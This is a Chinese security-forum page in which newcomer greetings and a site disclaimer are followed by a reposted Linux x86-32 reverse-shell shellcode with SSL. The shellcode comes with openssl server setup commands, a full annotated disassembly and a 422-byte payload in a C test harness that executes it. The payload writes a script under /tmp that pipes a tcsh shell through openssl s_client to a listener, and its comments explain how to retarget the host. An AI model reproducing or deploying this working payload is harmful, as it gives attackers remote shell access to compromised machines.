
New member, please go easy on me

Newbie here, came in to learn, and hope everyone will give me plenty of advice. Thanks, and may the forum keep getting better.
Non-Security China Network disclaimer 1. All statements and images in this post are solely the poster's personal opinion and have nothing to do with this site's position;
2. This topic was posted by: Fiend; the poster Fiend complies with the six management rules of the "Copyright and Disclaimer Notice" and holds the related rights;
3. Other organizations or individuals must obtain the consent of the poster Fiend and of this site before using, reposting or quoting this post;
4. Parts of this post are reposted from other media and published on this site; the purpose of reposting is to convey more information, and it does not mean this site endorses the views or vouches for their accuracy;
5. If this post infringes the copyright of your site or of an individual, please notify this site immediately; it will be removed promptly and with our sincerest apologies;
6. The site administrators and moderators reserve the right to delete this post without notifying the poster in advance.

Reply to 1# Fiend

   A warm welcome! Please join the discussions and post often!


Holy crap, how long has this place been dead?


A new classmate has arrived...


Linux/x86-32 - ConnectBack with SSL connection

/*
**
** Title: Linux/x86-32 - ConnectBack with SSL connection - 422 bytes
** Date: 2011-06-08
** Tested on: ArchLinux i686
** Author: Jonathan Salwan - twitter: @shell_storm
**
** http://shell-storm.org
**
**
** Server configuration
** ===========================================================================
** jonathan@ArchLinux [ssl] $ openssl genrsa -des3 -out server.key 1024
** jonathan@ArchLinux [ssl] $ openssl req -new -key server.key -out server.csr
** jonathan@ArchLinux [ssl] $ cp server.key server.key.org
** jonathan@ArchLinux [ssl] $ openssl rsa -in server.key.org -out server.key
** jonathan@ArchLinux [ssl] $ openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
** jonathan@ArchLinux [ssl] $ ll
** total 16
** -rw-r--r-- 1 jonathan users 757 Jun 8 09:36 server.crt
** -rw-r--r-- 1 jonathan users 603 Jun 8 09:36 server.csr
** -rw-r--r-- 1 jonathan users 887 Jun 8 09:36 server.key
** -rw-r--r-- 1 jonathan users 963 Jun 8 09:36 server.key.org
** jonathan@ArchLinux [ssl] $
**
**
** Running server
** ===========================================================================
** jonathan@ArchLinux [ssl] $ openssl s_server -key server.key -cert server.crt -accept 8080
**
**
** After the server was opened you can send the shellcode.
** Warning! The client needs tcsh and openssl installed.
**
**
** Shellcode information
** ===========================================================================
**
** Reverse TCP with SSL (why not)
** Linux x86 32bits
** 422 bytes
**
**
** ASM sources
** ===========================================================================
**

** 08048054 <main>:
**  8048054:  31 c0                 xor    %eax,%eax
**  8048056:  50                    push   %eax
**  8048057:  6a 65                 push   $0x65
**  8048059:  68 6b 70 69 70        push   $0x7069706b
**  804805e:  68 2f 62 61 63        push   $0x6361622f
**  8048063:  68 2f 74 6d 70        push   $0x706d742f
**  8048068:  89 e3                 mov    %esp,%ebx
**  804806a:  b0 0a                 mov    $0xa,%al
**  804806c:  cd 80                 int    $0x80
**  804806e:  85 c0                 test   %eax,%eax
**  8048070:  75 32                 jne    80480a4 <del2>
**  8048072:  31 c0                 xor    %eax,%eax
**  8048074:  31 db                 xor    %ebx,%ebx
**  8048076:  31 d2                 xor    %edx,%edx
**  8048078:  b3 01                 mov    $0x1,%bl
**  804807a:  31 c0                 xor    %eax,%eax
**  804807c:  50                    push   %eax
**  804807d:  6a 6e                 push   $0x6e
**  804807f:  66 68 64 5c           pushw  $0x5c64
**  8048083:  68 6c 65 74 65        push   $0x6574656c
**  8048088:  68 65 20 64 65        push   $0x65642065
**  804808d:  68 6b 70 69 70        push   $0x7069706b
**  8048092:  68 2f 62 61 63        push   $0x6361622f
**  8048097:  68 2f 74 6d 70        push   $0x706d742f
**  804809c:  89 e1                 mov    %esp,%ecx
**  804809e:  b2 17                 mov    $0x17,%dl
**  80480a0:  b0 04                 mov    $0x4,%al
**  80480a2:  cd 80                 int    $0x80
**
** 080480a4 <del2>:
**  80480a4:  31 c0                 xor    %eax,%eax
**  80480a6:  50                    push   %eax
**  80480a7:  66 68 73 6c           pushw  $0x6c73
**  80480ab:  68 2f 63 62 73        push   $0x7362632f
**  80480b0:  68 2f 74 6d 70        push   $0x706d742f
**  80480b5:  89 e3                 mov    %esp,%ebx
**  80480b7:  b0 0a                 mov    $0xa,%al
**  80480b9:  cd 80                 int    $0x80
**  80480bb:  85 c0                 test   %eax,%eax
**  80480bd:  75 2a                 jne    80480e9 <open>
**  80480bf:  31 c0                 xor    %eax,%eax
**  80480c1:  31 db                 xor    %ebx,%ebx
**  80480c3:  31 d2                 xor    %edx,%edx
**  80480c5:  50                    push   %eax
**  80480c6:  68 65 64 5c 6e        push   $0x6e5c6465
**  80480cb:  68 65 6c 65 74        push   $0x74656c65
**  80480d0:  68 73 6c 20 64        push   $0x64206c73
**  80480d5:  68 2f 63 62 73        push   $0x7362632f
**  80480da:  68 2f 74 6d 70        push   $0x706d742f
**  80480df:  89 e1                 mov    %esp,%ecx
**  80480e1:  b3 01                 mov    $0x1,%bl
**  80480e3:  b2 14                 mov    $0x14,%dl
**  80480e5:  b0 04                 mov    $0x4,%al
**  80480e7:  cd 80                 int    $0x80
**
** 080480e9 <open>:
**  80480e9:  31 c0                 xor    %eax,%eax
**  80480eb:  31 c9                 xor    %ecx,%ecx
**  80480ed:  31 d2                 xor    %edx,%edx
**  80480ef:  66 b9 41 04           mov    $0x441,%cx
**  80480f3:  66 ba a4 01           mov    $0x1a4,%dx
**  80480f7:  50                    push   %eax
**  80480f8:  66 68 73 6c           pushw  $0x6c73
**  80480fc:  68 2f 63 62 73        push   $0x7362632f
**  8048101:  68 2f 74 6d 70        push   $0x706d742f
**  8048106:  89 e3                 mov    %esp,%ebx
**  8048108:  b0 05                 mov    $0x5,%al
**  804810a:  cd 80                 int    $0x80
**  804810c:  89 c6                 mov    %eax,%esi
**
** 0804810e <wtite>:
**  804810e:  31 d2                 xor    %edx,%edx
**  8048110:  89 f3                 mov    %esi,%ebx
**  8048112:  31 c0                 xor    %eax,%eax
**  8048114:  50                    push   %eax
**  8048115:  66 68 70 65           pushw  $0x6570
**  8048119:  68 63 6b 70 69        push   $0x69706b63
**  804811e:  68 70 2f 62 61        push   $0x61622f70
**  8048123:  68 3e 2f 74 6d        push   $0x6d742f3e
**  8048128:  68 73 68 20 31        push   $0x31206873
**  804812d:  68 6e 2f 74 63        push   $0x63742f6e
**  8048132:  68 20 2f 62 69        push   $0x69622f20
**  8048137:  68 70 65 20 7c        push   $0x7c206570
**  804813c:  68 63 6b 70 69        push   $0x69706b63
**  8048141:  68 70 2f 62 61        push   $0x61622f70
**  8048146:  68 3c 2f 74 6d        push   $0x6d742f3c
**
**            \x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x3a\x38\x30\x38\x30  >----------+
**            localhost:8080                                                        |
**            If you change that you need to change write(... ... size_t) (%edx)    |
**                                                                                  |
**  804814b:  68 38 30 20 30        push   $0x30203038   <---+
**  8048150:  68 74 3a 38 30        push   $0x30383a74   <---+
**  8048155:  68 6c 68 6f 73        push   $0x736f686c   <---+
**  804815a:  68 6c 6f 63 61        push   $0x61636f6c   <---+
**
**
**  804815f:  68 65 63 74 20        push   $0x20746365
**  8048164:  68 63 6f 6e 6e        push   $0x6e6e6f63
**  8048169:  68 6e 74 20 2d        push   $0x2d20746e
**  804816e:  68 63 6c 69 65        push   $0x65696c63
**  8048173:  68 6c 20 73 5f        push   $0x5f73206c
**  8048178:  68 65 6e 73 73        push   $0x73736e65
**  804817d:  68 6e 2f 6f 70        push   $0x706f2f6e
**  8048182:  68 72 2f 62 69        push   $0x69622f72
**  8048187:  68 20 2f 75 73        push   $0x73752f20
**  804818c:  68 70 20 26 26        push   $0x26262070
**  8048191:  68 69 70 65 20        push   $0x20657069
**  8048196:  68 61 63 6b 70        push   $0x706b6361
**  804819b:  68 6d 70 2f 62        push   $0x622f706d
**  80481a0:  68 64 20 2f 74        push   $0x742f2064
**  80481a5:  68 6d 6b 6e 6f        push   $0x6f6e6b6d
**  80481aa:  89 e1                 mov    %esp,%ecx
**  80481ac:  b2 77                 mov    $0x77,%dl
**  80481ae:  31 c0                 xor    %eax,%eax
**  80481b0:  b0 04                 mov    $0x4,%al
**  80481b2:  cd 80                 int    $0x80
**
** 080481b4 <close>:
**  80481b4:  31 c0                 xor    %eax,%eax
**  80481b6:  b0 06                 mov    $0x6,%al
**  80481b8:  89 f3                 mov    %esi,%ebx
**  80481ba:  cd 80                 int    $0x80
**
** 080481bc <execve>:
**  80481bc:  31 c0                 xor    %eax,%eax
**  80481be:  50                    push   %eax
**  80481bf:  66 68 73 6c           pushw  $0x6c73
**  80481c3:  68 2f 63 62 73        push   $0x7362632f
**  80481c8:  68 2f 74 6d 70        push   $0x706d742f
**  80481cd:  89 e3                 mov    %esp,%ebx
**  80481cf:  50                    push   %eax
**  80481d0:  66 68 2d 65           pushw  $0x652d
**  80481d4:  89 e1                 mov    %esp,%ecx
**  80481d6:  50                    push   %eax
**  80481d7:  6a 68                 push   $0x68
**  80481d9:  66 68 2f 73           pushw  $0x732f
**  80481dd:  68 2f 62 69 6e        push   $0x6e69622f
**  80481e2:  89 e2                 mov    %esp,%edx
**  80481e4:  50                    push   %eax
**  80481e5:  53                    push   %ebx
**  80481e6:  51                    push   %ecx
**  80481e7:  52                    push   %edx
**  80481e8:  89 e1                 mov    %esp,%ecx
**  80481ea:  89 d3                 mov    %edx,%ebx
**  80481ec:  31 d2                 xor    %edx,%edx
**  80481ee:  b0 0b                 mov    $0xb,%al
**  80481f0:  cd 80                 int    $0x80
**
** 080481f2 <exit>:
**  80481f2:  31 c0                 xor    %eax,%eax
**  80481f4:  b0 01                 mov    $0x1,%al
**  80481f6:  31 db                 xor    %ebx,%ebx
**  80481f8:  cd 80                 int    $0x80
**
**
*/



#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The 422 payload bytes; the test harness below jumps into this array in place,
   so the data segment must be executable for it to run. */
char SC[] = "\x31\xc0\x50\x6a\x65\x68\x6b\x70\x69\x70\x68\x2f\x62\x61\x63"
            "\x68\x2f\x74\x6d\x70\x89\xe3\xb0\x0a\xcd\x80\x85\xc0\x75\x32"
            "\x31\xc0\x31\xdb\x31\xd2\xb3\x01\x31\xc0\x50\x6a\x6e\x66\x68"
            "\x64\x5c\x68\x6c\x65\x74\x65\x68\x65\x20\x64\x65\x68\x6b\x70"
            "\x69\x70\x68\x2f\x62\x61\x63\x68\x2f\x74\x6d\x70\x89\xe1\xb2"
            "\x17\xb0\x04\xcd\x80\x31\xc0\x50\x66\x68\x73\x6c\x68\x2f\x63"
            "\x62\x73\x68\x2f\x74\x6d\x70\x89\xe3\xb0\x0a\xcd\x80\x85\xc0"
            "\x75\x2a\x31\xc0\x31\xdb\x31\xd2\x50\x68\x65\x64\x5c\x6e\x68"
            "\x65\x6c\x65\x74\x68\x73\x6c\x20\x64\x68\x2f\x63\x62\x73\x68"
            "\x2f\x74\x6d\x70\x89\xe1\xb3\x01\xb2\x14\xb0\x04\xcd\x80\x31"
            "\xc0\x31\xc9\x31\xd2\x66\xb9\x41\x04\x66\xba\xa4\x01\x50\x66"
            "\x68\x73\x6c\x68\x2f\x63\x62\x73\x68\x2f\x74\x6d\x70\x89\xe3"
            "\xb0\x05\xcd\x80\x89\xc6\x31\xd2\x89\xf3\x31\xc0\x50\x66\x68"
            "\x70\x65\x68\x63\x6b\x70\x69\x68\x70\x2f\x62\x61\x68\x3e\x2f"
            "\x74\x6d\x68\x73\x68\x20\x31\x68\x6e\x2f\x74\x63\x68\x20\x2f"
            "\x62\x69\x68\x70\x65\x20\x7c\x68\x63\x6b\x70\x69\x68\x70\x2f"
            "\x62\x61\x68\x3c\x2f\x74\x6d"
            /* localhost:8080 */
            "\x68\x38\x30\x20\x30\x68\x74\x3a\x38\x30\x68\x6c\x68\x6f\x73"
            "\x68\x6c\x6f\x63\x61"
            /* EOF */
            "\x68\x65\x63\x74\x20\x68\x63\x6f\x6e\x6e\x68\x6e\x74\x20\x2d"
            "\x68\x63\x6c\x69\x65\x68\x6c\x20\x73\x5f\x68\x65\x6e\x73\x73"
            "\x68\x6e\x2f\x6f\x70\x68\x72\x2f\x62\x69\x68\x20\x2f\x75\x73"
            "\x68\x70\x20\x26\x26\x68\x69\x70\x65\x20\x68\x61\x63\x6b\x70"
            "\x68\x6d\x70\x2f\x62\x68\x64\x20\x2f\x74\x68\x6d\x6b\x6e\x6f"
            "\x89\xe1\xb2\x77\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x06\x89"
            "\xf3\xcd\x80\x31\xc0\x50\x66\x68\x73\x6c\x68\x2f\x63\x62\x73"
            "\x68\x2f\x74\x6d\x70\x89\xe3\x50\x66\x68\x2d\x65\x89\xe1\x50"
            "\x6a\x68\x66\x68\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe2\x50\x53"
            "\x51\x52\x89\xe1\x89\xd3\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0"
            "\x01\x31\xdb\xcd\x80";

int main(void)
{
    /* strlen() is a valid length check here only because the payload contains no NUL byte */
    fprintf(stdout, "Length: %zu\n", strlen(SC));
    (*(void(*)()) SC)();
}


















Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities, please follow


My learning role models: 妖精‖→小瑶, 爱海滔滔, 峥婉儿, 话裳, 希望, 涛涛俊, 为你伤心为你哭

















